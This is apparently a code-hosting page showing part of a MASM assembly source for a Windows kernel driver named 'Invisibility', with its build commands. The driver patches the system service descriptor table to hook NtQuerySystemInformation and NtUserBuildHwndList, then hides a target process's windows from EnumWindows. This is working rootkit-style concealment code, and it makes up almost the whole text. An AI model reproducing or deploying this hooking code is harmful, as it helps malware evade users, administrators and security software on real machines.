📄 invisibilitykmd.bat
字号:
; HWND from the process we want to hide ?
MOV EAX, dwPID
CMP EAX, dwTargetPID
JNZ @F
MOV DWORD PTR [ESI], 0FFFFh ; corrupt the chain item rather than REP MOVSX
@@:
; next chain entry
LODSD
SUB ECX, ECX
CMP ECX, [ESI] ; end of HWND list ?? (DD 0x0)
JZ @@loop_end
INC ECX
CMP ECX, [ESI] ; end of HWND list ?? (DD 0x1)
JZ @@loop_end
jmp @@loop
@@loop_end:
RET
HandleNtUserBuildHwndListHookOutput ENDP
;
; NTSTATUS NTAPI
; NtUserBuildHwndList( ; my guesses
; IN ARGUMENT_1, ; ...
; IN hParentHwnd, ; ..
; IN BOOL,
; IN ARGUMENT_4,
; IN SpaceForHandlesInBufferCount,
; OUT pOutputBuffer,
; OUT pbResult
; );
;
NtUserBuildHwndListHook:
; INT 3
; call the original NT API handler
PUSH [ESP + 4 + 4 * 6] ; push org arg 7
PUSH [ESP + 4 + 4 * 6] ; push org arg 6
PUSH [ESP + 4 + 4 * 6] ; ...
PUSH [ESP + 4 + 4 * 6]
PUSH [ESP + 4 + 4 * 6]
PUSH [ESP + 4 + 4 * 6]
PUSH [ESP + 4 + 4 * 6]
CALL pOldWin32kNUBHL ; call org API addr
; we come into play - modify output
PUSHFD
PUSHA
TEST EAX, EAX ; did the call succeed ?
JNZ @@NUBHLH_mod_fini
LEA ESI, [ESP + 4 + SIZEOF PUSHA_STRUCT + 4] ; ESI -> org arg list
CMP [ESI + 4 * 1], EAX ; arg 2 == 0 when called from EnumWindows
JNZ @@NUBHLH_mod_fini
CMP [ESI + 4 * 2], EAX ; arg 3 == 0 when called from EnumWindows
JNZ @@NUBHLH_mod_fini
PUSH [ESI + 4 * 5] ; push arg 6 - pOutputBuffer
CALL HandleNtUserBuildHwndListHookOutput
@@NUBHLH_mod_fini:
POPA
POPFD
RET 4 * 7
;
; Purpose: Hook the targets
;
; Return type: void
;
EstablishHook PROC USES ESI EDI EBX
; INT 3
; test whether we've all needed information
SUB EAX, EAX
DEC EAX ; EAX == -1
CMP dwNQSI_NT_ID, EAX
JZ @@exit
CMP dwTargetPID, EAX
JZ @@exit
CMP dwNUBHL_NT_ID, EAX
JZ @@exit
CMP pGetWindowThreadProcessId, EAX
; overwrite NQSI's API address in SSDT
MOV EAX, _KeServiceDescriptorTable
MOV EDI, [EAX] ; EDI -> ptr 2 SSDT
MOV EDX, dwNQSI_NT_ID ; EDX == NQSI ID
MOV EBX, NtQuerySystemInformationHook
MOV EDI, [EDI].SSDT.pSSAT ; EDI -> Native API addr chain
XCHG EBX, [EDI + 4 * EDX]
MOV pOldNtOsNQSI, EBX ; save old handler
; over write NUBHL's API address in SSDT
MOV EAX, pKSDTS
MOV EDI, [EAX] ; EDI -> Native API addr chain
MOV EDX, dwNUBHL_NT_ID
SUB EDX, 01000h ; exclude 0x1000 flag from win32k ID
MOV EBX, NtUserBuildHwndListHook
XCHG EBX, [EDI + 4 * EDX]
MOV pOldWin32kNUBHL, EBX
@@exit:
RET
EstablishHook ENDP
;
; Purpose: Unhook the locations
;
; Return type: void
;
UnhookSystem PROC USES ESI EDI EBX
; INT 3
SUB EAX, EAX
CMP pOldNtOsNQSI, EAX
JZ @@exit
CMP pOldWin32kNUBHL, EAX
JZ @@exit
; rewrite NQSI API address in SSDT
MOV EAX, _KeServiceDescriptorTable
MOV EAX, [EAX]
MOV EAX, [EAX].SSDT.pSSAT
MOV EDX, dwNQSI_NT_ID
MOV EBX, pOldNtOsNQSI
MOV [EAX + EDX * 4], EBX
; rewrite NUBHL API address in SSDT
MOV EAX, pKSDTS
MOV EAX, [EAX].SSDT.pSSAT
MOV EDX, dwNUBHL_NT_ID
SUB EDX, 01000h ; exclude 0x1000 flag from win32k ID
MOV EBX, pOldWin32kNUBHL
MOV [EAX + EDX * 4], EBX
@@exit:
RET
UnhookSystem ENDP
Comment %
;
; Return type: void*
;
GetMem PROC dwc : DWORD
PUSH dwc
PUSH PagedPool
CALL ExAllocatePool
RET
GetMem ENDP
;
; Return type: void
;
FreeMem PROC p : LPVOID
PUSH p
CALL ExFreePool
RET
FreeMem ENDP
%
;
; Purpose: Handle device IO requests
;
DriverDispatch PROC USES ESI EDI EBX, pDriverObject, pIrp
MOV EDI, pIrp ; EDI -> IRP struct
ASSUME EDI : PTR _IRP
SUB EAX, EAX
MOV [EDI].IoStatus.Information, EAX
MOV [EDI].IoStatus.Status, EAX
ASSUME EDI : NOTHING
MOV ESI, (_IRP PTR [EDI]).PCurrentIrpStackLocation ; ESI -> IRP stack
ASSUME ESI : PTR IO_STACK_LOCATION
.IF [ESI].MajorFunction == IRP_MJ_DEVICE_CONTROL
; INT 3
MOV EAX, [ESI].DeviceIoControl.IoControlCode ; EAX = DeviceIoControl code
.IF EAX == IOC_PROVIDE1
MOV EAX, (_IRP PTR [EDI]).SystemBuffer ; EAX -> in buffer
PUSH [EAX]
PUSH [EAX]
POP pNQSI
CALL NativeApiIdFromApiAddress
MOV dwNQSI_NT_ID, EAX
.ELSEIF EAX == IOC_PROVIDE2
MOV EAX, (_IRP PTR [EDI]).SystemBuffer ; EAX -> in buffer
PUSH [EAX]
POP dwTargetPID
.ELSEIF EAX == IOC_PROVIDE3
MOV EAX, (_IRP PTR [EDI]).SystemBuffer ; EAX -> in buffer
;PUSH [EAX]
;POP pEW
MOV EAX, [EAX] ; EAX == EnumWindows ptr
LEA EAX, [EAX - 14]
PUSH EAX
CALL NativeApiIdFromApiAddress
MOV dwNUBHL_NT_ID, EAX
.ELSEIF EAX == IOC_PROVIDE4
MOV EAX, (_IRP PTR [EDI]).SystemBuffer
PUSH [EAX]
POP pGetWindowThreadProcessId
.ELSEIF EAX == IOC_HOOK
CALL EstablishHook
.ELSEIF EAX == IOC_UNHOOK
CALL UnhookSystem
.ENDIF
.ENDIF
ASSUME ESI : NOTHING
MOV EDX, IO_NO_INCREMENT ; special calling
MOV ECX, pIrp
CALL IoCompleteRequest
MOV EAX, STATUS_SUCCESS
RET
DriverDispatch ENDP
DriverUnload PROC USES EBX ESI EDI, DriverObject
LOCAL usSym : UNICODE_STRING
; cleanup
INVOKE RtlInitUnicodeString, ADDR usSym, OFFSET szSymPath
INVOKE IoDeleteSymbolicLink, ADDR usSym
INVOKE IoDeleteDevice, pDevObj
RET
DriverUnload ENDP
.CODE INIT
DriverEntry PROC USES EBX ESI EDI, DriverObject, RegPath
LOCAL usDev : UNICODE_STRING
LOCAL usSym : UNICODE_STRING
; INT 3
; create device/symbolic link
INVOKE RtlInitUnicodeString, ADDR usDev, OFFSET szDevPath
INVOKE IoCreateDevice, DriverObject, 0, ADDR usDev, FILE_DEVICE_NULL, 0, FALSE, OFFSET pDevObj
OR EAX, EAX
JNZ @@ExitProcErr
INVOKE RtlInitUnicodeString, ADDR usSym, OFFSET szSymPath
INVOKE IoCreateSymbolicLink, ADDR usSym, ADDR usDev
OR EAX, EAX
JNZ @@ExitProcErr
; setup DriverObject
MOV ESI, DriverObject
ASSUME ESI : PTR DRIVER_OBJECT
MOV [ESI].PDISPATCH_IRP_MJ_DEVICE_CONTROL, OFFSET DriverDispatch
MOV [ESI].PDISPATCH_IRP_MJ_CREATE, OFFSET DriverDispatch
MOV [ESI].PDRIVER_UNLOAD, OFFSET DriverUnload
ASSUME ESI : NOTHING
; get/save the addr of GetKeServiceDescriptorTableShadow
CALL GetKeServiceDescriptorTableShadow
MOV pKSDTS, EAX
MOV EAX, STATUS_SUCCESS
@@ExitProc:
RET
@@ExitProcErr:
RET
DriverEntry ENDP
End DriverEntry
:MAKE
\MASM32\BIN\ML /c /coff /Gz /Cp /nologo InvisibilityKMD.BAT
\MASM32\BIN\LINK /nologo /DRIVER /BASE:0X10000 /ALIGN:32 /OUT:Invisibility.sys /SUBSYSTEM:NATIVE /IGNORE:4078 /OPTidata InvisibilityKMD.obj
MOVE Invisibility.sys ..
DEL *.OBJ
ECHO.
PAUSE
CLS⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -